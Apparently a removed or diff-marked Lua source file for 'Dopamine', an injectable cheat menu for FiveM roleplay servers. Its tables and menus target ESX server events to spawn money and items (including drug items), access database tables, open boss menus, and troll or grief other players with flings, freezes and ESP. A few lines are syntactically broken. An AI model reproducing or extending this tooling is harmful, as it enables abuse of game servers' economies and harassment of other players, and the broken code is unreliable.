- function Dopamine.runDrawMenu()
- if Dopamine.isMenuVisible(Dopamine.menuProps.currentMenu) then
- if Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].aboutToBeClosed then
- Dopamine.closeMenu()
- else
- ClearAllHelpMessages()
- Dopamine.drawTitle()
- Dopamine.drawSubTitle()
- Dopamine.menuProps.currentKey = nil
- if IsDisabledControlJustReleased(1, Dopamine.menuProps.keys.down) then
- Dopamine.natives.playSoundFrontend(-1, 'NAV_UP_DOWN', 'HUD_FRONTEND_DEFAULT_SOUNDSET', true)
- if Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].currentOption < Dopamine.menuProps.optionCount then
- Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].currentOption = Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].currentOption + 1
- else
- Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].currentOption = 1
- end
- elseif IsDisabledControlJustReleased(1, Dopamine.menuProps.keys.up) then
- Dopamine.natives.playSoundFrontend(-1, 'NAV_UP_DOWN', 'HUD_FRONTEND_DEFAULT_SOUNDSET', true)
- if Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].currentOption > 1 then
- Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].currentOption = Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].currentOption - 1
- else
- Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].currentOption = Dopamine.menuProps.optionCount
- end
- elseif IsDisabledControlJustReleased(1, Dopamine.menuProps.keys.left) then
- Dopamine.menuProps.currentKey = Dopamine.menuProps.keys.left
- elseif IsDisabledControlJustReleased(1, Dopamine.menuProps.keys.right) then
- Dopamine.menuProps.currentKey = Dopamine.menuProps.keys.right
- elseif IsDisabledControlJustReleased(1, then
- Dopamine.menuProps.currentKey =
- elseif IsDisabledControlJustReleased(1, Dopamine.menuProps.keys.back) then
- if Dopamine.menuProps.shitMenus[Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].previousMenu] then
- Dopamine.natives.playSoundFrontend(-1, 'BACK', 'HUD_FRONTEND_DEFAULT_SOUNDSET', true)
- Dopamine.setMenuVisible(Dopamine.menuProps.shitMenus[Dopamine.menuProps.currentMenu].previousMenu, true)
- else
- Dopamine.closeMenu()
- end
- end
- Dopamine.menuProps.optionCount = 0
- end
- end
- end
- function Dopamine.setMenuWidth(id, width)
- Dopamine.setMenuProperty(id, 'width', width)
- end
- function Dopamine.setMenuX(id, x)
- Dopamine.setMenuProperty(id, 'x', x)
- end
- function Dopamine.setMenuY(id, y)
- Dopamine.setMenuProperty(id, 'y', y)
- end
- function Dopamine.setMenuMaxOptionCountOnScreen(id, count)
- Dopamine.setMenuProperty(id, 'maxOptionCount', count)
- end
- function Dopamine.setTitle(id, title)
- Dopamine.setMenuProperty(id, 'title', title)
- end
- function Dopamine.setTitleColor(id, r, g, b, a)
- Dopamine.setMenuProperty(id, 'titleColor', { ['r'] = r, ['g'] = g, ['b'] = b, ['a'] = a or Dopamine.menuProps.shitMenus[id].titleColor.a })
- end
- function Dopamine.setTitleBackgroundColor(id, r, g, b, a)
- Dopamine.setMenuProperty(id, 'titleBackgroundColor', { ['r'] = r, ['g'] = g, ['b'] = b, ['a'] = a or Dopamine.menuProps.shitMenus[id].titleBackgroundColor.a })
- end
- function Dopamine.setTitleBackgroundSprite(id, textureDict, textureName)
- Dopamine.natives.requestStreamedTextureDict(textureDict)
- Dopamine.setMenuProperty(id, 'titleBackgroundSprite', { dict = textureDict, name = textureName })
- end
- function Dopamine.setTitleBackgroundSpriteNil(id)
- Dopamine.setMenuProperty(id, 'titleBackgroundSprite', nil)
- end
- function Dopamine.setSubTitle(id, text)
- Dopamine.setMenuProperty(id, 'subTitle', text)
- end
- function Dopamine.setMenuBackgroundColor(id, r, g, b, a)
- Dopamine.setMenuProperty(id, 'menuBackgroundColor', { ['r'] = r, ['g'] = g, ['b'] = b, ['a'] = a or Dopamine.menuProps.shitMenus[id].menuBackgroundColor.a })
- end
- function Dopamine.setMenuSubTitleBackgroundColor(id, r, g, b, a)
- Dopamine.setMenuProperty(id, 'subTitleBackgroundColor', { ['r'] = r, ['g'] = g, ['b'] = b, ['a'] = a or Dopamine.menuProps.shitMenus[id].subTitleBackgroundColor.a })
- end
- function Dopamine.setMenuTextColor(id, r, g, b, a)
- Dopamine.setMenuProperty(id, 'menuTextColor', { ['r'] = r, ['g'] = g, ['b'] = b, ['a'] = a or Dopamine.menuProps.shitMenus[id].menuTextColor.a })
- end
- function Dopamine.setMenuSubTextColor(id, r, g, b, a)
- Dopamine.setMenuProperty(id, 'menuSubTextColor', { ['r'] = r, ['g'] = g, ['b'] = b, ['a'] = a or Dopamine.menuProps.shitMenus[id].menuSubTextColor.a })
- end
- function Dopamine.setMenuFocusTextColor(id, r, g, b, a)
- Dopamine.setMenuProperty(id, 'menuFocusTextColor', { ['r'] = r, ['g'] = g, ['b'] = b, ['a'] = a or Dopamine.menuProps.shitMenus[id].menuFocusTextColor.a })
- end
- function Dopamine.setMenuFocusColor(id, r, g, b, a)
- Dopamine.setMenuProperty(id, 'menuFocusColor', { ['r'] = r, ['g'] = g, ['b'] = b, ['a'] = a or Dopamine.menuProps.shitMenus[id].menuFocusColor.a })
- end
- function Dopamine.setMenuButtonPressedSound(id, name, set)
- Dopamine.setMenuProperty(id, 'buttonPressedSound', { ['name'] = name, ['set'] = set })
- end
- function Dopamine.setFont(id, font)
- Dopamine.menuProps.buttonFont = font
- Dopamine.menuProps.shitMenus[id].titleFont = font
- end
- local _be_aN = be_aN
- function Dopamine.setMaxOptionCount(id, count)
- Dopamine.setMenuProperty(id, 'maxOptionCount', count)
- end
- function Dopamine.setMenuFocusBackgroundColor(id, r, g, b, a)
- Dopamine.setMenuProperty(id, 'menuFocusBackgroundColor', {['r'] = r, ['g'] = g, ['b'] = b, ['a'] = a or Dopamine.menuProps.shitMenus[id].menuFocusBackgroundColor.a})
- end
- pCreateThread(function()
- --[[Handle rainbow theme]]
- while Dopamine.shouldShowMenu do pWait(0)
- Dopamine.menuProps.rainbowInt = Dopamine.trashFunctions.returnRGB(0.2)
- if Dopamine.menuProps.selectedThemeRainbow then
- Dopamine.mainColor = {
- r = Dopamine.menuProps.rainbowInt.r,
- g = Dopamine.menuProps.rainbowInt.g,
- b = Dopamine.menuProps.rainbowInt.b,
- a = 255
- }
- end
- end
- end)
- function Dopamine.setTheme(id)
- if Dopamine.menuProps.selectedTheme == 'Light' then
- Dopamine.mainColor = {
- r = 89,
- g = 173,
- b = 218,
- a = 255
- }
- Dopamine.setTitleBackgroundSprite(id, 'commonmenu', 'interaction_bgd')
- Dopamine.setMenuBackgroundColor(id, 45, 45, 45, 225)
- Dopamine.setMenuFocusBackgroundColor(id, 25, 25, 25, 225)
- Dopamine.setMenuSubTitleBackgroundColor(id, 0, 0, 0, 255)
- Dopamine.setTitleBackgroundColor(id, Dopamine.mainColor.r, Dopamine.mainColor.g, Dopamine.mainColor.b, 255)
- Dopamine.setTitleColor(id, 255, 255, 255, 255)
- Dopamine.setMenuTextColor(id, 150, 150, 150)
- Dopamine.setMenuFocusTextColor(id, 175, 175, 175, 255)
- Dopamine.setMenuSubTextColor(id, 155, 155, 155, 225)
- Dopamine.setFont(id, 4)
- Dopamine.setMenuX(id, 0.025)
- Dopamine.setMenuY(id, 0.3)
- Dopamine.setMenuWidth(id, 0.25)
- Dopamine.setMaxOptionCount(id, Dopamine.menuProps.maximumOptionCount)
- Dopamine.menuProps.titleHeight = 0.0525
- Dopamine.menuProps.titleXOffset = 0.15
- Dopamine.menuProps.titleYOffset = 0.00485
- Dopamine.menuProps.titleScale = 0.7
- Dopamine.menuProps.titleSpacing = 2.0
- Dopamine.menuProps.buttonHeight = 0.035
- Dopamine.menuProps.buttonScale = 0.360
- Dopamine.menuProps.buttonTextXOffset = 0.003
- Dopamine.menuProps.buttonTextYOffset = 0.0025
- Dopamine.menuTabsColors = {
- selfOptions = {r=255, g=255, b=255},
- onlineOptions = {r=255, g=255, b=255},
- visualOptions = {r=255, g=255, b=255},
- teleportOptions = {r=255, g=255, b=255},
- vehicleOptions = {r=255, g=255, b=255},
- weaponOptions = {r=255, g=255, b=255},
- serverOptions = {r=255, g=255, b=255},
- menuOptions = {r=255, g=255, b=255}
- }
- elseif Dopamine.menuProps.selectedTheme == 'Dark' then
- Dopamine.mainColor = {
- r = 225,
- g = 55,
- b = 55,
- a = 255
- }
- Dopamine.setTitleBackgroundSprite(id, 'shopui_title_sm_hangar', 'shopui_title_sm_hangar')
- --[[Dopamine.setTitleBackgroundSpriteNil(id)]]
- Dopamine.setMenuBackgroundColor(id, 25, 25, 25, 225)
- Dopamine.setMenuFocusBackgroundColor(id, 50, 50, 50, 230)
- Dopamine.setMenuSubTitleBackgroundColor(id, 35, 35, 35, 255)
- Dopamine.setTitleBackgroundColor(id, 15, 15, 15, 255)
- Dopamine.setTitleColor(id, 135, 135, 135, 255)
- Dopamine.setMenuTextColor(id, 150, 150, 150)
- Dopamine.setMenuFocusTextColor(id, 155, 155, 155, 255)
- Dopamine.setMenuSubTextColor(id, 70, 70, 70, 255)
- Dopamine.setFont(id, 4)
- Dopamine.setMenuX(id, 0.025)
- Dopamine.setMenuY(id, 0.3)
- Dopamine.setMenuWidth(id, 0.25)
- Dopamine.setMaxOptionCount(id, Dopamine.menuProps.maximumOptionCount)
- Dopamine.menuProps.titleHeight = 0.0525
- Dopamine.menuProps.titleXOffset = 0.15
- Dopamine.menuProps.titleYOffset = 0.00485
- Dopamine.menuProps.titleScale = 0.7
- Dopamine.menuProps.titleSpacing = 2.0
- Dopamine.menuProps.buttonHeight = 0.035
- Dopamine.menuProps.buttonScale = 0.360
- Dopamine.menuProps.buttonTextXOffset = 0.003
- Dopamine.menuProps.buttonTextYOffset = 0.0025
- Dopamine.menuTabsColors = {
- selfOptions = {r=255, g=255, b=255},
- onlineOptions = {r=255, g=255, b=255},
- visualOptions = {r=255, g=255, b=255},
- teleportOptions = {r=255, g=255, b=255},
- vehicleOptions = {r=255, g=255, b=255},
- weaponOptions = {r=255, g=255, b=255},
- serverOptions = {r=255, g=255, b=255},
- menuOptions = {r=255, g=255, b=255}
- }
- elseif Dopamine.menuProps.selectedTheme == 'Classic' then
- Dopamine.mainColor = {
- r = 105,
- g = 55,
- b = 255,
- a = 255
- }
- Dopamine.setTitleBackgroundSpriteNil(id)
- Dopamine.setMenuBackgroundColor(id, 25, 25, 25, 225)
- Dopamine.setMenuFocusBackgroundColor(id, 50, 50, 50, 230)
- Dopamine.setMenuSubTitleBackgroundColor(id, 35, 35, 35, 255)
- Dopamine.setTitleBackgroundColor(id, 15, 15, 15, 255)
- Dopamine.setTitleColor(id, 135, 135, 135, 255)
- Dopamine.setMenuTextColor(id, 150, 150, 150)
- Dopamine.setMenuFocusTextColor(id, 155, 155, 155, 255)
- Dopamine.setMenuSubTextColor(id, 70, 70, 70, 255)
- Dopamine.setFont(id, 4)
- Dopamine.setMenuX(id, 0.025)
- Dopamine.setMenuY(id, 0.3)
- Dopamine.setMenuWidth(id, 0.25)
- Dopamine.setMaxOptionCount(id, 12)
- Dopamine.menuProps.titleHeight = 0.0525
- Dopamine.menuProps.titleXOffset = 0.15
- Dopamine.menuProps.titleYOffset = 0.00485
- Dopamine.menuProps.titleScale = 0.7
- Dopamine.menuProps.titleSpacing = 2.0
- Dopamine.menuProps.buttonHeight = 0.035
- Dopamine.menuProps.buttonScale = 0.360
- Dopamine.menuProps.buttonTextXOffset = 0.003
- Dopamine.menuProps.buttonTextYOffset = 0.0025
- Dopamine.menuTabsColors = {
- selfOptions = {r=26, g=288, b=156},
- onlineOptions = {r=52, g=152, b=219},
- visualOptions = {r=236, g=240, b=241},
- teleportOptions = {r=241, g=196, b=15},
- vehicleOptions = {r=230, g=126, b=34},
- weaponOptions = {r=231, g=76, b=60},
- serverOptions = {r=155, g=89, b=182},
- menuOptions = {r=155, g=89, b=182}
- }
- end
- end
- function Dopamine.initTheme()
- for i = 1, #Dopamine.menus_list do
- Dopamine.setTheme(Dopamine.menus_list[i], Dopamine.menuProps.selectedTheme)
- end
- end
- --[[
- Notifications system
- ]]
- Dopamine.addNotification = function(text, ms)
- table.insert(Dopamine.cachedNotifications, { ['text'] = text, ['time'] = ms, ['startTime'] = GetGameTimer() })
- end
- Dopamine.removeNotification = function(id)
- table.remove(Dopamine.cachedNotifications, id)
- end
- Dopamine.draw_3D = function(x, y, text, opacity)
- if opacity > 255 then
- opacity = 255
- elseif opacity < 0 then
- opacity = 0
- end
- Dopamine.natives.setTextScale(0.35, 0.35)
- if Dopamine.menuProps.menu_TextDropShadow then
- Dopamine.natives.setTextDropShadow(0, 0, 0, 0,255)
- end
- SetTextEdge(2, 0, 0, 0, 255)
- if Dopamine.menuProps.menu_TextOutline then
- Dopamine.natives.setTextOutline()
- end
- Dopamine.natives.setTextFont(4)
- Dopamine.natives.setTextProportional(1)
- Dopamine.natives.setTextColour(255, 255, 255, math.floor(opacity))
- Dopamine.natives.beginTextCommandDisplayText('STRING')
- SetTextCentre(1)
- Dopamine.natives.addTextComponentSubstringPlayerName(text)
- Dopamine.natives.endTextCommandDisplayText(x, y)
- local factor = string.len(text) / 300
- Dopamine.natives.drawRect(x, y + 0.0135, 0.0155 + factor, 0.03, 25, 25, 25, opacity)
- Dopamine.natives.drawRect(x, y + 0.0125, 0.015 + factor, 0.03, Dopamine.mainColor.r, Dopamine.mainColor.g, Dopamine.mainColor.b, opacity)
- end
- Dopamine.pushNotification = function(text, ms)
- if text then
- if not ms then ms = 5000 end
- Dopamine.addNotification(text, ms)
- end
- end
- Dopamine.pushNotification('Dopamine injected successfully', 5000)
- Dopamine.pushNotification('d0pamine', 10000)
- Dopamine.storedControls = {
- --[[Self Opts]]
- godmode = false,
- semiGodmode = false,
- infStamina = false,
- neverWanted = false,
- noClip = false,
- invisible = false,
- bInvisible = false,
- noRagdoll = false,
- superJump = false,
- magnetoMode = false,
- heatVision = false,
- nightVision = false,
- tinyPlayer = false,
- bTinyPlayer = false,
- flashmanSP = false,
- --[[Vehicle Opts]]
- vehGodmode = false,
- veh2Step = false,
- vehRainbowCol = false,
- vehRainbowLights = false,
- vehWallride = false,
- vehSpawnUpgraded = false,
- vehSpawnInside = true,
- vehAlwaysWheelie = false,
- vehDriftSmoke = false,
- currentDisappearFromChase = 1,
- selectedDisappearFromChase = 1,
- --[[Weapon Opts]]
- weapSpawnAsPickup = false,
- weapExplosiveAmmo = false,
- weapCustomBullet = false,
- weaponsDamageMultiplier = {1.0, 2.0, 3.0, 5.0, 10.0, 25.0, 50.0, 250.0, 1000.0},
- weaponsDamageMultiplierCurrent = 1,
- weaponsDamageMultiplierSelected = 1,
- weaponsDamageMultiplierSet = 1,
- weaponsGiveAmmoCurrent = 1,
- weaponsGiveAmmoSelected = 1,
- --[[Visual Opts]]
- visPlayerBlips = false,
- visForceRadar = false,
- visForceGamertags = false,
- visForceThirdperson = false,
- visESPEnable = false,
- visESPShowID = false,
- visESPShowName = false,
- visESPShowDistance = false,
- visESPShowWeapon = false,
- visESPShowVehicle = false,
- visDrawFPS = false,
- visualsESPRefreshRate = 0,
- visualsESPRefreshRates = {'0ms', '50ms', '150ms', '250ms', '500ms', '1s', '2s', '5s'},
- visualsESPDistanceOps = {50.0, 100.0, 500.0, 1000.0, 2000.0, 5000.0},
- visualsESPDistance = 500.0,
- currentVisualsESPDistance = 1,
- selectedVisualsESPDistance = 1,
- currentESPRefreshIndex = 1,
- selectedESPRefreshIndex = 1,
- --[[Teleport Opts]]
- teleShowCoords = false,
- currentTeleportToOptions = 1,
- selectedTeleportToOptions = 1,
- --[[Single Player Opts]]
- sPOIsSpectating = false,
- sPOFlingPlayer = false,
- sPOFlingedPlayer = nil,
- spectatedPlayer = nil,
- sPOShootAtOptionsCurrent = 1,
- sPOShootAtOptionsSelected = 1,
- --[[All Players Opts]]
- aPOFlyingCars = false,
- aPOFreeze = false,
- aPODisableDrivingCars = false,
- aPONoisyVehs = false,
- }
- Dopamine.menuTables = {
- weaponsCustomBullet = {
- current = 1,
- selected = 1,
- actual = 1,
- words = {'RPG', 'Firework', 'Flare', 'Tracer Rocket', 'Tank Rocket'},
- },
- vehiclePerformanceTable = {
- { name = 'Engine', id = 11 },
- { name = 'Brakes', id = 12 },
- { name = 'Transmission', id = 13 },
- { name = 'Suspension', id = 15 },
- { name = 'Armour', id = 16 }
- },
- serverKashactersSQL = {
- current = 1,
- selected = 1,
- actual = 1,
- words = {'User Inventory', 'Owned Vehicles', 'Bills', 'Shops', 'Characters', 'Vehicles'},
- lists = {'user_inventory', 'owned_vehicles', 'billing', 'shops', 'characters', 'vehicles'}
- },
- trollsPropBlock = {
- current = 1,
- selected = 1,
- words = {'Legion Square', 'MRPD', 'PDM'}
- },
- exploitableJobsTable = {
- 'Unemployed',
- 'Mechanic',
- 'Police',
- 'Ambulance',
- 'Taxi',
- 'Real Estate Agent',
- 'Car Dealer',
- 'Banker',
- 'Gang',
- 'Mafia',
- },
- customExploitableItems = {},
- }
- Dopamine.menuTables.exploitableJobsTable.Item = {
- 'Butcher', 'Tailor', 'Miner', 'Fueler', 'Lumberjack', 'Fisher', 'Hunting', 'Weed', 'Meth', 'Coke', 'Opium'
- }
- Dopamine.menuTables.exploitableJobsTable.ItemDatabase = {
- ['Butcher'] ={ 'Alive Chicken', 'alive_chicken', 'Slaughtered Chicken', 'slaughtered_chicken', 'Packaged Chicken', 'packaged_chicken' },
- ['Tailor'] ={ 'Wool', 'wool', 'Fabric', 'fabric', 'Clothes', 'clothe' },
- ['Fueler'] ={ 'Petrol', 'petrol', 'Refined Petrol', 'petrol_raffin', 'Essence', 'essence' },
- ['Miner'] ={ 'Stone', 'stone', 'Washed Stone', 'washed_stone', 'Diamond', 'diamond' },
- ['Lumberjack'] ={ 'Wood', 'wood', 'Cutted Wood', 'cutted_wood', 'Packed Plank', 'packaged_plank' },
- ['Fisher'] ={ 'Fish', 'fish' },
- ['Hunting'] ={ 'Meat', 'meat'},
- ['Coke'] ={ 'Coke', 'coke', 'Coke Bag', 'coke_pooch' },
- ['Weed'] ={ 'Weed', 'weed', 'Weed Bag', 'weed_pooch' },
- ['Meth'] ={ 'Meth', 'meth', 'Meth Bag', 'meth_pooch' },
- ['Opium'] ={ 'Opium', 'opium', 'Opium Bag', 'opium_pooch' },
- }
- Dopamine.menuTables.exploitableJobsTable.ItemRequires = {
- ['Fabric'] = 'Wool',
- ['Clothes'] = 'Fabric',
- ['Washed Stone'] = 'Stone',
- ['Diamond'] = 'Washed Stone',
- ['Coke Bag'] = 'coke',
- ['Weed Bag'] = 'weed',
- ['Meth Bag'] = 'meth',
- ['Opium Bag'] = 'opium'
- }
- Dopamine.menuTables.exploitableJobsTable.Money = {
- 'Fuel Delivery',
- 'Car Thief',
- 'DMV School',
- 'Dirty Job',
- 'Pizza Boy',
- 'Ranger Job',
- 'Garbage Job',
- 'Car Thief',
- 'Trucker Job',
- 'Postal Job',
- 'Banker Job',
- }
- Dopamine.menuTables.exploitableJobsTable.Money.Value = {
- 'esx_fueldelivery',
- 'esx_carthief',
- 'esx_dmvschool',
- 'esx_godirtyjob',
- 'esx_pizza',
- 'esx_ranger',
- 'esx_garbagejob',
- 'esx_carthief',
- 'esx_truckerjob',
- 'esx_gopostaljob',
- 'esx_banksecurity'
- }
- --[[
- Add variables here for magic.
- ]]
- local be_aN2 = 'number'
- Dopamine.keyBinds = {
- currentKeybindMenu = {
- label = 'Menu',
- handle = 'TAB',
- },
- currentKeybindHealth = {
- label = 'Re-fill Health',
- handle = nil,
- },
- currentKeybindArmour = {
- label = 'Re-fill Armour',
- handle = nil,
- },
- currentKeybindNoclip = {
- label = 'Toggle Noclip',
- handle = nil,
- },
- currentKeybindMagneto = {
- label = 'Toggle Magneto',
- handle = nil,
- },
- }
- local currentCustomCrosshair = 1
- local selectedCustomCrosshair = 1
- local _be_aN2 = be_aN2
- local customCrosshairOpts = {
- 'Off',
- 'Default',
- 'Custom'
- }
- Dopamine.menuTables.customExploitableItems.Item = {
- 'Repair Kit', 'Bandage', 'Medkit', 'Bitcoin', 'Gold', 'Jewels', 'Drill', 'Lockpick'
- }
- Dopamine.menuTables.customExploitableItems.ItemDatabase = {
- ['Repair Kit'] ={ 'Repair Kit', 'fixkit' },
- ['Bandage'] ={ 'Bandage', 'bandage' },
- ['Medkit'] ={ 'Medkit', 'medikit' },
- ['Bitcoin'] ={ 'Bitcoin', 'bitcoin' },
- ['Gold'] ={ 'Gold', 'gold' },
- ['Jewels'] ={ 'Jewels', 'jewels' },
- ['Drill'] ={ 'Drill', 'drill' },
- ['Lockpick'] ={ 'Lockpick', 'lockpick' },
- }
- Dopamine.menuTables.customExploitableItems.ItemRequires = {
- ['Repair Kit'] = 'fixkit',
- ['Bandage'] = 'bandage',
- ['Medkit'] = 'medikit',
- ['Bitcoin'] = 'bitcoin',
- ['Gold'] = 'gold',
- ['Jewels'] = 'jewels',
- ['Drill'] = 'drill',
- ['Lockpick'] = 'lockpick',
- }
- local currentESXJobPaycheck = 1
- local selectedESXJobPaycheck = 1
- local currentESXItemSpawn = 1
- local selectedESXItemSpawn = 1
- local currentESXHarvestItem = 1
- local selectedESXHarvestItem = 1
- local currentESXCustomItemSpawn = 1
- local selectedESXCustomItemSpawn = 1
- local availableESXBossMenus = {'Police', 'Ambulance', 'Mechanic', 'Taxi', 'Cardealer', 'Gang', 'RealEstateAgent'}
- local currentESXOpenBossMenu = 1
- local selectedESXOpenBossMenu = 1
- --[[
- Menu settings.
- ]]
- local currentMenuX = 1
- local selectedMenuX = 1
- local currentMenuY = 4
- local selectedMenuY = 4
- local menuX = { 0.025, 0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.75 }
- local menuY = { 0.025, 0.1, 0.2, 0.3, 0.425 }
- local currentMenuOptionsCount = 4
- local selectedMenuOptionsCount = 4
- local menuOptionsCount = { 5, 10, 11, 12, 13, 14, 15, 20, 25 }
- Dopamine.comboBoxes = {
- [0] = {
- _words = {'Option 1', 'Option 2'},
- _current = 1,
- _selected = 1,
- },
- [1] = {
- _words = {'Lower', 'Raise'},
- _current = 1,
- _selected = 1,
- },
- [2] = {
- _words = {'jester3', 'elegy', 'sultanrs', 'coquette3', 'monster', 'banshee2', 'specter', 'xa21'},
- _current = 1,
- _selected = 1,
- },
- [3] = {
- _words = {'+1%', '+2%', '+4%', '+8%', '+16%', '+32%', '+64%', '+128%', '+256%', '+512%'},
- _actual = {1.0, 2.0, 4.0, 8.0, 16.0, 32.0, 64.0, 128.0, 256.0, 512.0},
- _current = 1,
- _selected = 1,
- },
- [4] = {
- _words = {'Gas Pump', 'Beach Fire', 'Gas Tank', 'UFO', 'Dildo', 'Toilet', 'Missile', 'Couch', 'Banana Party', 'Ramp'},
- _actual = {
- {'prop_gas_pump_1d', 'prop_gas_pump_1b', 'prop_gas_pump_old3', 'prop_gas_pump_1a'},
- 'prop_beach_fire', 'prop_gas_tank_01a', 'p_spinning_anus_s', 'prop_cs_dildo_01', 'prop_ld_toilet_01', 'prop_ld_bomb_anim', 'prop_ld_farm_couch01',
- {'p_crahsed_heli_s', 'prop_rock_4_big2', 'prop_beachflag_le'},
- {'stt_prop_stunt_track_uturn', 'stt_prop_stunt_track_turnice', 'stt_prop_stunt_track_hill'}
- },
- _current = 1,
- _selected = 1,
- },
- }
- pCreateThread(function()
- --[[themes]]
- local currentThemeIndex = 3
- local selectedThemeIndex = 3
- local currentCheckboxIndex = 1
- local selectedCheckboxIndex = 1
- --[[selfOptions]]
- local FastCB = {1.0, 1.09, 1.19, 1.29, 1.39, 1.49}
- local FastCBWords = {'+0%', '+20%', '+40%', '+60%', '+80%', '+100%'}
- local currentFastRunIndex = 1
- local selectedFastRunIndex = 1
- local currentFastSwimIndex = 1
- local selectedFastSwimIndex = 1
- --[[allPlayersOptions]]
- local pedDensityX = {1.0, 0.8, 0.6, 0.4, 0.2, 0.1, 0.0}
- local pedDensityXCurrent = 1
- local pedDensityXSelectedf = 1
- local pedDensityXWords = {'Default', '-20%', '-40%', '-60%', '-80%', '-100%'}
- local pedDensityXSelected = 1
- --[[selectedPlayerOptions]]
- local sPORamVehicleCurrent = 1
- local sPORamVehicleSelected = 1
- local sPORamVehicleX = 'bus'
- local sPORamVehicleWords = {'bus', 'monster', 'freight', 'bulldozer'}
- --[[vehicleOptions]]
- local vehiclesEnginePowerBoostCurrent = 1
- local vehiclesEnginePowerBoostSelected = 1
- local vehiclesEngineTorqueBoostCurrent = 1
- local vehiclesEngineTorqueBoostSelected = 1
- --[[weaponOptions]]
- local weaponOptionsSelected = nil
- local weaponOptionsSelectedWeapon = nil
- local weaponOptionsSelectedMod = nil
- Dopamine.createMenu('dopamine', 'Dopamine')
- Dopamine.setSubTitle('dopamine', 'd0pamine - final source')
- Dopamine.createSubMenu('selfOptions', 'dopamine', 'Self Options')
- Dopamine.createSubMenu('onlinePlayersOptions', 'dopamine', 'Online Players')
- Dopamine.createSubMenu('visualOptions', 'dopamine', 'Visual Options')
- Dopamine.createSubMenu('teleportOptions', 'dopamine', 'Teleport Options')
- Dopamine.createSubMenu('vehicleOptions', 'dopamine', 'Vehicle Options')
- Dopamine.createSubMenu('weaponOptions', 'dopamine', 'Weapon Options')
- Dopamine.createSubMenu('serverOptions', 'dopamine', 'Server Options')
- Dopamine.createSubMenu('menuSettings', 'dopamine', 'Menu Options')
- Dopamine.createSubMenu('selfSuperPowers', 'selfOptions', 'Super Powers')
- Dopamine.createSubMenu('selfClothing', 'selfOptions', 'Clothing')
- Dopamine.createSubMenu('allPlayersOptions', 'onlinePlayersOptions', 'All Online Players')
- Dopamine.createSubMenu('allPlayersOptionsTriggers', 'allPlayersOptions', 'All Online Players Triggers')
- Dopamine.createSubMenu('selectedPlayerOptions', 'onlinePlayersOptions', 'Selected Player Options')
- Dopamine.createSubMenu('selectedPlayerOptionsTriggers', 'selectedPlayerOptions', 'Selected Player Trigger Options')
- Dopamine.createSubMenu('selectedPlayerOptionsTroll', 'selectedPlayerOptions', 'Selected Player Troll Options')
- Dopamine.createSubMenu('selectedPlayerOptionsWeapon', 'selectedPlayerOptions', 'Selected Player Weapon Options')
- Dopamine.createSubMenu('visualOptionsESP', 'visualOptions', 'Visual ESP Options')
- Dopamine.createSubMenu('savedVehiclesOptions', 'vehicleOptions', 'Saved Vehicles Options')
- Dopamine.createSubMenu('selectedSavedVehicleOptions', 'savedVehiclesOptions', 'Slected Saved Vehicle Options')
- Dopamine.createSubMenu('vehicleLosSantosCustoms', 'vehicleOptions', 'Los Santos Customs')
- Dopamine.createSubMenu('vehicleLosSantosCustomsCosmetics', 'vehicleLosSantosCustoms', 'Los Santos Customs | Cosmetics')
- Dopamine.createSubMenu('vehicleLosSantosCustomsPerformance', 'vehicleLosSantosCustoms', 'Los Santos Customs | Performance')
- for i, actual_i in pairs(Dopamine.menuTables.vehiclePerformanceTable) do
- Dopamine.createSubMenu('vehicleLosSantosCustomsPerformance', 'vehicleLosSantosCustomsPerformance', 'Los Santos Customs | '
- end
- Dopamine.createSubMenu('vehicleSpawnList', 'vehicleOptions', 'Vehicle Spawn Options')
- Dopamine.createSubMenu('vehicleSpawnSelected', 'vehicleSpawnList', 'Select A Vehicle')
- Dopamine.createSubMenu('vehicleSpawnSelectedOptions', 'vehicleSpawnSelected', 'Vehicle Spawn Selected')
- Dopamine.createSubMenu('weaponOptionsModification', 'weaponOptions', 'Weapon Modification')
- Dopamine.createSubMenu('weaponOptionsTypes', 'weaponOptions', 'Weapon Type Selection')
- Dopamine.createSubMenu('weaponOptionsTypeSelection', 'weaponOptionsTypes', 'Weapon Selection')
- Dopamine.createSubMenu('weaponsModOptions', 'weaponOptionsTypeSelection', 'Weapon Options')
- Dopamine.createSubMenu('weaponsModSelect', 'weaponsModOptions', 'Weapon Mod Options')
- Dopamine.createSubMenu('serverOptionsResources', 'serverOptions', 'Server Resources')
- Dopamine.createSubMenu('serverOptionsResourcesSelected', 'serverOptionsResources', 'Selected Resource')
- Dopamine.createSubMenu('serverOptionsResourcesSelectedCEvents', 'serverOptionsResourcesSelected', 'Selected Resource Client Events')
- Dopamine.createSubMenu('serverOptionsResourcesSelectedSEvents', 'serverOptionsResourcesSelected', 'Selected Resource Server Events')
- Dopamine.createSubMenu('serverOptionsTriggerEvents', 'serverOptions', 'Trigger Events')
- Dopamine.createSubMenu('serverOptionsTriggerEventsESX', 'serverOptionsTriggerEvents', 'ESX Trigger Events')
- Dopamine.createSubMenu('serverOptionsTriggerEventsVRP', 'serverOptionsTriggerEvents', 'vRP Trigger Events')
- Dopamine.createSubMenu('serverOptionsTriggerEventsESXMoney', 'serverOptionsTriggerEventsESX', 'ESX Money Options')
- Dopamine.createSubMenu('credits', 'menuSettings', 'Menu Credits')
- Dopamine.createSubMenu('keybindSettings', 'menuSettings', 'Keybind Settings')
- Dopamine.initTheme(1)
- if Dopamine.functions.doesResourceExist('es_extended') then
- Dopamine.datastore.ESX = exports['es_extended']:getSharedObject()
- else
- Dopamine.datastore.ESX = nil
- end
- local introInteger = 0
- while Dopamine.shouldShowMenu do
- Dopamine.datastore.pLocalPlayer.cVehicle = GetVehiclePedIsUsing(Dopamine.datastore.pLocalPlayer.pedId)
- Dopamine.datastore.pLocalPlayer.pedId = PlayerPedId(-1)
- if introInteger == 0 then
- introScaleform = Dopamine.trashFunctions.initIntro('mp_big_message_freemode', '~r~d0pamine | Press TAB')
- DrawScaleformMovieFullscreen(introScaleform, 80, 80, 80, 80, 0)
- pCreateThread(function()
- while Dopamine.shouldShowMenu do
- pWait(5000)
